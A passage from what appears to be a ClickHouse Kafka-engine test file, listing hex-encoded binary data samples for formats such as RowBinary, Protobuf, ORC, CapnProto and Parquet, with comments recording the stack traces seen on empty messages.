02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf': {
'data_sample': [
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x
1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x
50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x
1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x
00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
'Parquet' : {
'data_sample': [
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x
3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x